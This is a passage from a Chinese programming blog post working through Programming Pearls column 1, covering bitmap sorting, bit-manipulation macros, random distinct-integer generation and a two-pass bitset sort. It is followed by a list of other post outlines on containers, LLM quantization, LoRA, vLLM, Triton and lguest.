    for (j = S.begin(); j != S.end(); ++j)
        cout << *j << "\n";
    return 0;
}

2. 位操作

#define BITSPERWORD 32
#define SHIFT 5
#define MASK 0x1F
#define N 10000000
int a[1 + N/BITSPERWORD];

void set(int i) {        a[i>>SHIFT] |=  (1<<(i & MASK)); }
void clr(int i) {        a[i>>SHIFT] &= ~(1<<(i & MASK)); }
int  test(int i){ return a[i>>SHIFT] &   (1<<(i & MASK)); }

3. 位图排序与系统排序位图排序最快，qsort比stl sort快

4. 随机生成[0,n)之间不重复的随机数

/* Copyright (C) 1999 Lucent Technologies */
/* From 'Programming Pearls' by Jon Bentley */

/* bitsortgen.c -- gen $1 distinct integers from U[0,$2) */

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define MAXN 2000000
int x[MAXN];

int randint(int a, int b)
{       
    return a + (RAND_MAX * rand() + rand()) % (b + 1 - a);
}

int main(int argc, char *argv[])
{       
    int i, k, n, t, p;
    srand((unsigned) time(NULL));
    k = atoi(argv[1]);
    n = atoi(argv[2]);
    for (i = 0; i < n; i++)
        x[i] = i;
    for (i = 0; i < k; i++) {
        p = randint(i, n-1);
        t = x[p]; x[p] = x[i]; x[i] = t;
        printf("%d\n", x[i]);
    }
    return 0;
}

5. 最开始实现的需要1.25M，如果内存1M是严格限制的。应该分两次读取，第一次读取0到4999999之间的数，第二次读取5000000到10000000之间的数，这样需要的内存空间约是6.25M。下面给出july博客中的一个实现：

#include <iostream>
#include <ctime>
#include <bitset>

using namespace std;

const int max_each_scan = 5000000;
int main()
{
     clock_t begin = clock();
     bitset<max_each_scan + 1> bitmap;
     bitmap.reset();

     FILE* fp_unsorted_file = fopen("data.txt","r");
     int num;
     while(fscanf(fp_unsorted_file,"%d ",&num) != EOF)
     {
          if (num < max_each_scan)
          {
               bitmap.set(num,1);
          }
     }

     FILE* fp_sort_file = fopen("sort.txt","w");
     for (int i = 0; i < max_each_scan; ++i)
     {
          if (bitmap[i] == 1)
          {
               fprintf(fp_sort_file,"%d ",i);
          }
     }

     int result = fseek(fp_unsorted_file,0,SEEK_SET);
     if (result)
     {
          printf("fseek failed\n");
     }
     else
     {
          bitmap.reset();
          while(fscanf(fp_unsorted_file,"%d ",&num) != EOF)
          {
               if (num >= max_each_scan && num < 10000000)
               {
                    num -= max_each_scan;
                    bitmap.set(num,1);
               }
          }
          for (int i = 0; i < max_each_scan; ++i)
          {
               if (bitmap[i] == 1)
               {
                    fprintf(fp_sort_file, "%d ",i + max_each_scan );
               }
          }

     }

     clock_t end = clock();
     cout << "位图耗时:" << (end - begin) / CLK_TCK << "s" << endl;
     return 0;
}

6. 如果每个数据最多出现10次，那么需要4个bit来记录一个数。视内存情况决定使用单次或者多路排序。

7. 程序输入的安全性检验，数据不应超过一次，不应该小于0或者大于n。

8. 如果免费电话号码有800、878、888等，如何查看一个号码是否是免费号码。暂时只想到这个方法，跟本章思想一样，就是有n个号码就是耗内存1.25M*n。

9. 避免初始化问题网上google才理解了答案的意思。具体操作是声明两个数组from to以及一个变量top=0；

if(from[i] < top && to[from[i]] == i)  
{  
    printf("has used!\n")  
}  
else  
{  
    a[i] = 1;  
    from[i] = top;  
    to[top] = i;  
    top++;  
}  

top变量用来记录已经初始化过的元素个数，from[i]=top，相当于保持a[i]是第几个初始化过的元素，to[top]=i，用来致命第top个初始化的元素在data里的下标是多少。因此每次访问一个data元素时，判断from[i] < top，即data[i]元素是否被初始化过，但当top很大时，from[i]里被内存随便赋予的初始化值可能真的小于top，这时候我们就还需要to[from[i]] == i 的判断了来保证from[i] < top不是因为内存随意赋给from[i]的值本身就小于top而是初始化后小于的。这个还是要自己理解。

10. 使用电话号码最后两位作为客户的哈希索引，进行分类。

不忘初心 方得始终

Map non-root user in host to non-root user in container with the same uid

Introduction

The podman userns=keep-id implementation

The crun method

The gVisor method

Summary

大模型量化简介

量化简介

手动量化

使用quanto库量化

Ref

LoRA微调简介

大模型微调简介

LoRA 微调简介

LoRA微调实践

LoRA调试

vLLM中的LoRA

Ref

vLLM源码(V0)结构分析

模型的加载

请求的处理

vLLM中的Paged Attention分析

基本概念

物理block的分配

推理请求的block管理

Scheduler的初始化

请求的处理

KV cache的使用

推理前的数据准备工作

开始推理

transformer库中的kv cache分析与调试

kv cache原理

kv cache简单例子

transformer中的kv cache分析

总结

Ref

大模型是如何进行推理的？-transformer的一点代码调试分析

背景

通过transformer使用大模型

safetensors模型文件分析

safetensors模型文件加载到模型过程分析

模型的整体推理过程

总结

Deploy a 'hello world' model serving using triton server without GPU

Deploy a fashion-mnist model serving

train the model

deploy in triton server

prepare triton model file

start triton server

send request to triton server

calculate the accuracy

classcify one picture

Deploy a mnist model serving

train the model

deploy in triton server

send request to triton server

Ref

lguest internals

Related files

lguest architecture overview

Switcher

CPU virtualization

VM entry

VM exit

Hypercall

Memory virtualization

Initialization

Guest create pagetables

Interrupt virtualization

Overview

External interrupt

Virtual device interrupt

Guest trap

Direct trap

Device virtualization

Guest Time

Summary

Run lguest on Linux kernel 4.4

Background

不忘初心方得始终